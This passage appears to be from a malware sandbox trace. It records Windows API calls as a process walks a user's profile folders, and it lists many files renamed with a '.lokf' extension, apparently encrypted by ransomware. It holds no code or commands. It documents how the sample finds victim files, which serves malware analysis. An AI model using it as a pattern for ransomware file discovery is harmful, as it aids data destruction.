ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.616] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0146.616] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.616] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.616] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0146.616] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.616] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.617] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.617] PathFindFileNameW (pszPath="") returned="" [0146.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20bda870, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20c4cc90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20ce5210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0146.617] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.617] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.617] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0146.617] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.617] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.617] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.617] PathFindFileNameW (pszPath="") returned="" [0146.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.617] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.618] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0146.618] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0146.618] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0146.618] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0146.618] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.618] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.618] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0146.618] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.618] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.618] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.618] PathFindFileNameW (pszPath="") returned="" [0146.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0146.618] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.618] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0146.618] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.618] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.618] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.618] PathFindFileNameW (pszPath="") returned="" [0146.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2059aeb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.618] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2059aeb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fed6af0, ftCreationTime.dwHighDateTime=0x1d4cc9a, ftLastAccessTime.dwLowDateTime=0x9d0d7770, ftLastAccessTime.dwHighDateTime=0x1d4d3af, ftLastWriteTime.dwLowDateTime=0x2054ebf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe57f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cwxc45T02ajINP1wUK.wav.lokf", cAlternateFileName="CWXC45~1.LOK")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x20defbb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eIv9rDB", cAlternateFileName="")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71884ac0, ftCreationTime.dwHighDateTime=0x1d4cca3, ftLastAccessTime.dwLowDateTime=0x8fe086e0, ftLastAccessTime.dwHighDateTime=0x1d4c74e, ftLastWriteTime.dwLowDateTime=0x20574d50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa8d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="klr3tCyH3.wav.lokf", cAlternateFileName="KLR3TC~1.LOK")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x20efa550, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m4--j", cAlternateFileName="")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 1 [0146.619] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 0 [0146.619] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.619] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.619] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0146.619] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.619] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.619] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.619] PathFindFileNameW (pszPath="") returned="" [0146.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 0xffffffff [0146.619] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.619] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0146.619] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.619] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.620] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.620] PathFindFileNameW (pszPath="") returned="" [0146.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 0xffffffff [0146.620] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.620] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0146.620] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.620] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.620] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.620] PathFindFileNameW (pszPath="") returned="" [0146.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20822610, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.620] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20822610, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae81c2c0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0xbac96e90, ftLastAccessTime.dwHighDateTime=0x1d4d102, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12f9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02fNEn45dPvMPAwyDJ.bmp.lokf", cAlternateFileName="02FNEN~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23af6a0, ftCreationTime.dwHighDateTime=0x1d4cf2d, ftLastAccessTime.dwLowDateTime=0x839ad970, ftLastAccessTime.dwHighDateTime=0x1d4d451, ftLastWriteTime.dwLowDateTime=0x205c1010, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12d62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2JD7dc-DViv9j UmdwX.bmp.lokf", cAlternateFileName="2JD7DC~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7e1240, ftCreationTime.dwHighDateTime=0x1d4cdc8, ftLastAccessTime.dwLowDateTime=0xb0be800, ftLastAccessTime.dwHighDateTime=0x1d4c8c1, ftLastWriteTime.dwLowDateTime=0x205e7170, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7fe7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3iuJ8NWM9DLs-PEj.bmp.lokf", cAlternateFileName="3IUJ8N~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58b2bf0, ftCreationTime.dwHighDateTime=0x1d4d39a, ftLastAccessTime.dwLowDateTime=0xa98a9b0, ftLastAccessTime.dwHighDateTime=0x1d4c846, ftLastWriteTime.dwLowDateTime=0x2060d2d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12873, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6othUkm8ekP4Ec7T.gif.lokf", cAlternateFileName="6OTHUK~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c4cc940, ftCreationTime.dwHighDateTime=0x1d4d0d3, ftLastAccessTime.dwLowDateTime=0x27e0f020, ftLastAccessTime.dwHighDateTime=0x1d4c9ba, ftLastWriteTime.dwLowDateTime=0x2060d2d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="80aZ2tp21.gif.lokf", cAlternateFileName="80AZ2T~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60bab670, ftCreationTime.dwHighDateTime=0x1d4d0ee, ftLastAccessTime.dwLowDateTime=0x9b5ef470, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0x20633430, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x164c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9e3N7.bmp.lokf", cAlternateFileName="9E3N7B~1.LOK")) returned 1 [0146.621] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9555cca0, ftCreationTime.dwHighDateTime=0x1d4d538, ftLastAccessTime.dwLowDateTime=0x530dfa50, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, 